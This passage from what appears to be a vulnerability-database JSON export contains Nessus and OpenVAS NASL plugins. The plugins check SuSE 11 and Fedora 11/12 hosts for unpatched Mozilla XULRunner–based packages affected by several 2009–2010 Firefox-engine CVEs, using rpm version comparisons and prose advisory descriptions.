"ab3f1038294b2799bcc02c9464f5952d"}, {"key": "href", "hash": "3befc94faf03f2e4f184edfa4abb681f"}, {"key": "modified", "hash": "8fd3c0d10643d313d61153df455e9f87"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "273ea7552f2fedc728d1462e7791434b"}, {"key": "published", "hash": "b4a6e2d3ea9db02b543b396cfe424eb8"}, {"key": "references", "hash": "e938db2f4082460794bd2e693f4f3112"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "740a0956994833a204c3db234be57d8d"}, {"key": "title", "hash": "52a5411e7f071cae984d40f6bc064674"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "d08f0939c5b37f00c430bdfa38e26be9b6429884f73331efcfdbd1dc07e44e1e", "viewCount": 1, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44909);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8,\nfixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "44909", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit"]}

{"openvas": [{"lastseen": "2017-12-14T11:48:35", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035361.html", "2010-1936"], "pluginID": "861699", "description": "Check for the Version of epiphany", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for epiphany FEDORA-2010-1936", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2017-12-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861699", "id": "OPENVAS:861699", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for epiphany FEDORA-2010-1936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Epiphany is the web browser for the GNOME desktop. Its goal is to be\n simple and easy to use. Epiphany ties together many GNOME components\n in order to let you focus on the Web content, instead of the browser\n application.\n\n Epiphany is extensible through a plugin system. Existing plugins can be\n found in the epiphany-extensions package.\";\n\ntag_affected = \"epiphany on Fedora 11\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035361.html\");\n script_id(861699);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1936\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for epiphany FEDORA-2010-1936\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of epiphany\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"epiphany\", rpm:\"epiphany~2.26.3~8.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:08", "references": ["2010-1936", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035360.html"], "pluginID": "861650", "description": "Check for the Version of google-gadgets", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for google-gadgets FEDORA-2010-1936", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2017-12-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861650", "id": "OPENVAS:861650", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for google-gadgets FEDORA-2010-1936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"google-gadgets on Fedora 11\";\ntag_insight = \"Google Gadgets for Linux provides a platform for running desktop\n gadgets under Linux, catering to the unique needs of Linux users. It\n can run, without modification, many Google Desktop gadgets as well as\n the Universal Gadgets on iGoogle.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035360.html\");\n script_id(861650);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1936\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for google-gadgets FEDORA-2010-1936\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of google-gadgets\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"google-gadgets\", rpm:\"google-gadgets~0.11.1~5.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:32:22", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035354.html", "2010-1936"], "pluginID": "861667", "description": "Check for the Version of evolution-rss", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "title": "Fedora Update for evolution-rss FEDORA-2010-1936", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861667", "id": "OPENVAS:861667", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for evolution-rss FEDORA-2010-1936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"evolution-rss on Fedora 11\";\ntag_insight = \"This is an evolution plugin which enables evolution to read rss feeds.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035354.html\");\n script_id(861667);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1936\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for evolution-rss FEDORA-2010-1936\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of evolution-rss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-rss\", rpm:\"evolution-rss~0.1.4~10.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:45", "references": ["2010-1727", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035425.html"], "pluginID": "861689", "description": "Check for the Version of gnome-python2-extras", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for gnome-python2-extras FEDORA-2010-1727", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2017-12-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861689", "id": "OPENVAS:861689", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-python2-extras FEDORA-2010-1727\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-python2-extras on Fedora 12\";\ntag_insight = \"The gnome-python-extra package contains the source packages for additional\n Python bindings for GNOME. It should be used together with gnome-python.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035425.html\");\n script_id(861689);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1727\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for gnome-python2-extras FEDORA-2010-1727\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-python2-extras\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-python2-extras\", rpm:\"gnome-python2-extras~2.25.3~16.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T10:54:41", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035353.html", "2010-1936"], "pluginID": "1361412562310861618", "description": "Check for the Version of gnome-python2-extras", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "type": "openvas", "title": "Fedora Update for gnome-python2-extras FEDORA-2010-1936", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2018-01-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861618", "id": "OPENVAS:1361412562310861618", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-python2-extras FEDORA-2010-1936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-python2-extras on Fedora 11\";\ntag_insight = \"The gnome-python-extra package contains the source packages for additional\n Python bindings for GNOME. It should be used together with gnome-python.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035353.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861618\");\n script_version(\"$Revision: 8269 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 08:28:22 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1936\");\n script_cve_id(\"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0162\");\n script_name(\"Fedora Update for gnome-python2-extras FEDORA-2010-1936\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-python2-extras\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 